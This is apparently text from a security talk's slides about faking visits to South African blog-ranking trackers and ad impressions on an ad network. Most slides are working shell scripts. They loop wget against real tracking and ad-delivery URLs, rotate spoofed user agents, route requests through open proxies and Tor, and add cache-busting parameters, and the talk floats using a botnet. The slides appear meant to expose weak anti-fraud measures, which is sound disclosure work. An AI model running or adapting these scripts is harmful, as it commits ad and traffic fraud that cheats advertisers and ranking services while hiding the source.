9. while
[
1
]
do
wget
http://www.amatomu.com/log.php?
cid=a433e87b0eb>e493dc055153ae332be0eeda46c
done;
10. Don’t
crash
the
server!
More
random
log
entries
#!/bin/sh
Set
RANDOM=$$
while
[
1
]
do
let
"delay
=
RANDOM
%
30";
#
Random
0
to
30
Second
delay
wget
http://www.amatomu.com/log.php?
cid=a433e87b0eb>e493dc055153ae332be0eeda46c
echo
"Waiting
$delay
seconds"
sleep
$delay
done;
11. #!/bin/bash
set
RANDOM=$$
while
[
1
]
do
let
"delay
=
RANDOM
%
6";
wget
-‐-‐delete-‐after
http://afrigator.com/track/5013-‐none.gif
sleep
$delay;
done;
12. wget
User-‐Agent
visible
in
server
logs
All
visits
from
same
source
IP
address
13. http://www.user-‐agent.org
"Mozilla/4.0
(compatible;
MSIE
7.0;
Windows
NT
5.1;
.NET
CLR
1.1.4322;
.NET
CLR
2.0.50727;
.NET
CLR
3.0.04506.30
Mozilla/5.0
(Windows;
U;
Windows
NT
6.0;
en-‐US;
rv:1.9.0.4)
Gecko/2008102920
Firefox/3.0.4
Mozilla/5.0
(Windows;
U;
Windows
NT
5.1;
en-‐US;
rv:1.9.0.4)
Gecko/2008102920
Firefox/3.0.4
Mozilla/5.0
(X11;
U;
Linux
i686;
en-‐US;
rv:1.9.0.2)
Gecko/2008092313
Ubuntu/8.04
(hardy)
Firefox/3.1
Mozilla/5.0
(Windows;
U;
Windows
NT
6.0;
en-‐US;
rv:1.9.0.2)
Gecko/2008091620
Firefox/3.0.2
Mozilla/5.0
(Windows;
U;
Windows
NT
5.1;
en-‐US;
rv:1.9.0.1)
Gecko/2008070208
Firefox/3.0.0
Mozilla/5.0
(Windows;
Windows
NT
5.1;
en-‐US;
rv:1.8.1.9)
Gecko/20071025
Firefox/2.0.0.9
Mozilla/5.0
(Windows;
U;
Windows
NT
5.1;
en_US;
rv:1.8.1.6)
Gecko/20070725
Firefox/2.0.0.7
Mozilla/5.0
(Windows;
U;
Windows
NT
5.1;
en-‐US)
AppleWebKit/525.19
(KHTML,
like
Gecko)
Chrome/0.4.154.18
Safari/525.19
14. set
RANDOM=$$
while
[
1
]
do
let
"delay
=
RANDOM
%
30"
let
"ua
=
RANDOM
%
`wc
-‐l
useragents.txt
|
awk
'{print
$1}'`
+
1"
uastring=`sed
-‐n
${ua}p
useragents.txt;`
wget
-‐q
-‐-‐delete-‐after
-‐-‐user-‐agent="$uastring"
http://
www.amatomu.com/log.php?
cid=a433e87b0eb>e493dc055153ae332be0eeda46c
sleep
$delay
done;
15. “Tor
protects
you
by
bouncing
your
communications
around
a
distributed
network
of
relays
run
by
volunteers
all
around
the
world:
it
prevents
somebody
watching
your
Internet
connection
from
learning
what
sites
you
visit,
and
it
prevents
the
sites
you
visit
from
learning
your
physical
location.”
-‐-‐torproject.org
21. #20
of
31
“ top
non-‐US
startups
to
watch
worldwide”
by
Business
2.0
(money.cnn.com)
Top
10
International
Products
for
2008
–
ReadWriteWeb
Acquired
by
Naspers
Blah
blah
blah…
WTF?
Security
Anyone?
22. Invitations
to
launches
More
traffic
(ironic,
isn’t
it?)
Gadgets
for
review
Press
accreditation
Fake
a
career
as
a
social
media
expert
Social
engineering
hack
23. Ad
network
linking
bloggers
and
advertisers
Revenue
based
on
CPM
(ad
impressions)
CPM
is
horribly
broken
24. <!-‐-‐/*
Adgator.co.za
Javascript
Tag
v2.6.3
*/-‐-‐>
<script
type='text/javascript'><!-‐-‐//<![CDATA[
var
m3_u
=
(location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');
var
m3_r
=
Math.floor(Math.random()*99999999999);
if
(!document.MAX_used)
document.MAX_used
=
',';
document.write
("<scr"+"ipt
type='text/javascript'
src='"+m3_u);
document.write
("?zoneid=471");
document.write
('&cb='
+
m3_r);
if
(document.MAX_used
!=
',')
document.write
("&exclude="
+
document.MAX_used);
document.write
(document.charset
?
'&charset='+document.charset
:
(document.characterSet
?
'&charset='+document.characterSet
:
''));
document.write
("&loc="
+
escape(window.location));
if
(document.referrer)
document.write
("&referer="
+
escape(document.referrer));
if
(document.context)
document.write
("&context="
+
escape(document.context));
if
(document.mmm_fo)
document.write
("&mmm_fo=1");
document.write
("'></scr"+"ipt>");
//]]>-‐-‐></script><noscript><a
href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE'
target='_blank'><img
src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422'
border='0'
alt=''
/></a></noscript>
Only
care
about
ad
image:
http://ads.adgator.co.za/delivery/avw.php?
zoneid=471&n=ac71ad4f
25. No
ads
are
served
to
wget??
OpenX
Ad
Server
If
no
cookie
gets
set,
then
no
ad
gets
served
Certain
User
Agents
are
ignored
First
ad
served,
but
no
ads
thereafter
(caching?)
Geo-‐targeting
26. Accept
cookies
(and
turf
them)
&cb=RANDOM
parameter
(Cache
blocking)
tor
nodes
in
ZA?
Zombie
TelkomADSL
botnet?
Open
proxy
servers
–
Proof
of
Concept
27. let
"delay
=
RANDOM
%
40"
#
Up
to
40
second
delay
–
let’s
not
be
greedy
let
"prand
=
RANDOM
%
`wc
-‐l
proxies.txt
|
awk
'{print
$1}'`
+
1"
http_proxy=`sed
-‐n
${prand}p
proxies.txt;`
#
select
a
random
proxy
let
"ua
=
RANDOM
%
`wc
-‐l
useragents.txt
|
awk
'{print
$1}'`
+
1"
uastring=`sed
-‐n
${ua}p
useragents.txt;`
#
random
useragent
let
"rand
=
RANDOM
%
999999999"
#
random
integer
for
cache
blocking
if
[
$http_proxy
==
"tsocks"
];
then
#
1/3rd
of
the
time
route
through
tor
export
http_proxy=
/usr/bin/tsocks
/usr/local/bin/wget
-‐-‐no-‐clobber
-‐-‐no-‐cache
-‐-‐max-‐redirect=0
-‐-‐
user-‐agent="$uastring"
-‐-‐referer=http://ramboguy.co.za
"http://
ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
else
#
otherwise
request
the
ad
straight
through
the
SA
proxy
/usr/bin/wget
-‐d
-‐-‐no-‐clobber
-‐-‐no-‐cache
-‐-‐user-‐agent="$uastring"
-‐-‐
referer=http://ramboguy.co.za
"http://ads.adgator.co.za/delivery/avw.php?
zoneid=471&n=ac71ad4f&cb=$rand"
fi